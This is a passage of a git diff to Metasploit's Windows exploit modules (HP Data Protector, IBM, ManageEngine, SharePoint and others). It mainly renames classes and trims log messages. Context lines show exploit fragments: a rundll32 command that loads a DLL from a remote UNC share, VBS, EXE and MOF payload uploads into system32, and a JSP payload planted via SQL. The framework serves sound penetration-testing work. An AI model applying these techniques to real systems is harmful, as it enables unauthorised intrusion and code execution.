b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index b8fc3c811f..cf29c3b2d6 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = generate_payload_dll print_status("File available on #{unc}...") - print_status("#{peer} - Trying to execute remote DLL...") + print_status("Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index 7dd833c3c0..d600cbbad1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb index 807267a2c2..2e1c591fd1 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_dtbclslogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index cfa69e5d2f..c00f1e774e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end diff --git a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb index 0286f2ec02..65676817b8 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index b43d9af842..779082e32e 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -92,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") + print_status("Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") + print_status("Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_imc_uam.rb b/modules/exploits/windows/misc/hp_imc_uam.rb index 8055b0d947..6ba32d2958 100644 --- a/modules/exploits/windows/misc/hp_imc_uam.rb +++ b/modules/exploits/windows/misc/hp_imc_uam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index fb664c9ae6..7f7d4d2696 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'SSL3', 'PrependMigrate' => true }, 'Payload' => diff --git a/modules/exploits/windows/misc/hp_magentservice.rb b/modules/exploits/windows/misc/hp_magentservice.rb index 80b04a5bdc..041554ef94 100644 --- a/modules/exploits/windows/misc/hp_magentservice.rb +++ b/modules/exploits/windows/misc/hp_magentservice.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp @@ -37,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote { 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index b168c6ff5a..6da50b07fa 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 404dd0458a..f5dbf7bd77 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index f8aeca8a72..e0332ba2a2 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_omniinet_4.rb b/modules/exploits/windows/misc/hp_omniinet_4.rb index 2670342a6c..4128ceaf0c 100644 --- a/modules/exploits/windows/misc/hp_omniinet_4.rb +++ b/modules/exploits/windows/misc/hp_omniinet_4.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 25e196293b..a7e2b6619a 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -134,10 +134,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -157,11 +157,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -197,7 +197,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index f38eeb33a9..704f3f28c4 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -136,10 +136,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -159,11 +159,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -199,7 +199,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 0612f411ef..77ff5cd927 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index 85ad7d3da3..8b90ae8b18 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index 794f12d3c6..19e55148ad 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index ce739237e8..7a177f1417 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb index 7d538a816f..2b8ed7bd4c 100644 --- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb +++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b9be472306..965e5cc20c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote def check peer = "#{rhost}:#{rport}" - print_status("#{peer} - Checking if CIMListener exists...") + print_status("Checking if CIMListener exists...") res = send_request_cgi({ 'uri' => "/CIMListener/", @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll") - print_status("#{peer} - Injecting DLL...") + print_status("Injecting DLL...") res = send_request_cgi({ 'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll", @@ -302,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /CIMVERSION/ - print_status"#{peer} - Then injection seemed to work..." + print_status"Then injection seemed to work..." else fail_with(Failure::Unknown, "#{peer} - Unexpected response") end diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index cf81053e33..af43d8f24c 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 1457cd8de1..6a5f5a1bdb 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index e101f6beda..f1f6199933 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index fc6e775b23..e6aa0aa5eb 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb index 9831813bbc..b9e6600298 100644 --- a/modules/exploits/windows/misc/lianja_db_net.rb +++ b/modules/exploits/windows/misc/lianja_db_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index ad3de555e3..1ce06c4926 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") + vprint_status("Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Retrieving JSESSION ID") + print_status("Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 - print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") + print_status("JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), @@ -143,14 +143,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies - print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") + print_status("Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") - print_status("#{peer} - Executing JSP payload") + print_status("Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index a856002418..1ca77aead5 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 19c613356f..5bfbbb284b 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index c147e4ca8a..fdfaf0add6 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 8450f0562a..0d81ba82c5 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 5c46c811ed..e021f4f11e 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") + print_status("Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ @@ -127,21 +127,21 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{exe_name}") + print_error("Failed to upload #{exe_name}") return end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{mof_name}") + print_error("Failed to upload #{mof_name}") return end diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index a89f98e2de..ca13a1fbef 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 20139031b8..9c93950deb 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/nvidia_mental_ray.rb b/modules/exploits/windows/misc/nvidia_mental_ray.rb index 82a4b8f7a3..592f64903d 100644 --- a/modules/exploits/windows/misc/nvidia_mental_ray.rb +++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index ed26b02365..92a41a9510 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index a5637b1b3e..b00e4573e5 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index ef53ef6207..82bf4b2499 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 9a477457b6..b1d3e0876d 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 54caf13f2d..bd359502e7 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 9641fcacc5..99c952ef24 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -136,12 +136,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt << diagheader pkt << user_connect pkt << support_data - print_status("#{peer} - Sending initialize packet to the SAP Dispatcher") + print_status("Sending initialize packet to the SAP Dispatcher") sock.put(pkt) res = sock.get_once(-1) if not res - print_error("#{peer} - The connection with the Dispatcher has not been 